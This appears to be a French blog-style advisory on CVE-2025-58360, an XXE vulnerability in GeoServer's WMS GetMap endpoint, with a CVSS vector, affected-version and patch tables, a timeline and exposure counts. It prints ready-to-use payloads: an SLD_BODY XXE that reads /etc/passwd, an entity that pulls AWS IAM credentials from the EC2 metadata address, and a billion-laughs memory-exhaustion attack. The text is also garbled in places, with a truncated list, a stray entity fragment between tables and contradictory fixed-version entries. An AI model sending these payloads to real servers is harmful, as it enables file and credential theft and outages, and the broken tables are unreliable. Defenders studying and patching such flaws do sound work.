
CVE-2025-58360

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:LIl s'agit d'un XXE classique mais dévastateur dans l'endpoint GetMap du Web Map Service (WMS).
Les attaquants peuvent :
/etc/passwd, geoserver.xml, clés privées, etc.)→ Cela représente des dizaines de milliers de serveurs potentiellement vulnérables exposés sur Internet en ce moment même ! 🌐
Endpoint : POST /geoserver/wms
Paramètre clé : SLD_BODY (permet un style XML brut)
Chemin de code vulnérable : L'analyseur XML ne désactive pas la résolution des entités externes → XXE classique.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<sld:StyledLayerDescriptor xmlns:sld="http://www.opengis.net/sld" version="1.0.0">
<sld:UserLayer>
<sld:LayerFeatureConstraints>
<sld:FeatureTypeConstraint>&xxe;</sld:FeatureTypeConstraint>
</sld:LayerFeatureConstraints>
</sld:UserLayer>
</sld:StyledLayerDescriptor>
→ La réponse contient le contenu de /etc/passwd 🎉
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
→ Fuit des identifiants AWS temporaires si exécuté sur EC2.
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!-- repeat up to lol9 -->
]>
<lol>&lol9;</lol>
→ Consomme des gigaoctets de RAM en quelques secondes 💥
| Version | Date de publication | Lien de téléchargement |
|---|---|---|
| 2.27.0 | 25 nov. 2025 | https://geoserver.org/release/stable/ |
Utilisateurs de Docker :
docker pull osgeo/geoserver:2.27.0
<!ENTITY ou SYSTEM "file://| Date | Événement |
|---|---|
| Avant nov. 2025 | Découvert de manière autonome par le scanner IA XBOW |
| 25 nov. 2025 | Divulgation coordonnée → correctifs publiés |
| 25 nov. 2025 | CVE attribuée et publiée |
| 26 nov. 2025 | Les PoC deviennent viraux, les scans d'exposition explosent |
C'est un XXE de manuel qui frappe une plateforme géospatiale largement déployée avec des dizaines de milliers d'instances exposées sur Internet.
Les correctifs sont sortis le jour même de la divulgation — un immense bravo à l'équipe GeoServer pour sa réactivité ! 🏆
Mais la fenêtre entre la disponibilité des correctifs et l'exploitation massive se réduit rapidement.
Si vous utilisez GeoServer → mettez à jour dès aujourd'hui.
Ne devenez pas le prochain gros titre.
Restez sécurisé, restez brillant ! 🛡️✨
| Composant | Versions vulnérables | Corrigé dans | Statut |
|---|
| GeoServer autonome | 2.26.0 – 2.26.1 ≤ 2.25.5 | 2.26.3, 2.25.6, 2.27.0 | 🔴 Vulnérable |
| Docker (osgeo/geoserver) | 2.26.0 – 2.26.1 ≤ 2.25.5 | 2.26.2+, 2.27.0 | 🔴 Vulnérable |
| Maven org.geoserver:gs-wms | 2.26.0 – 2.26.1 ≤ 2.25.5 | 2.26.2+, 2.25.6 | 🔴 Vulnérable |
| Maven org.geoserver.web:gs-web-app | 2.26.0 – 2.26.1 ≤ 2.25.5 | 2.26.2+, 2.25.6 | 🔴 Vulnérable |
| GeoServer 2.27.x et plus récent | – | Déjà corrigé | ✅ Sûr |
| Source | Instances exposées | Notes |
|---|
| ZoomEye | ~49,400 | recherche app:"GeoServer" |
| FOFA | ~24,000 | Résultats de l'année écoulée |
| Shodan | ~31,000 | Port 8080 + correspondance de titre |
| GobySec | ~20,000 | Scan du réseau public |
| 2.26.3 | 25 nov. 2025 | Correctif de la branche de maintenance |
| 2.25.6 | 25 nov. 2025 | Branche supportée plus ancienne |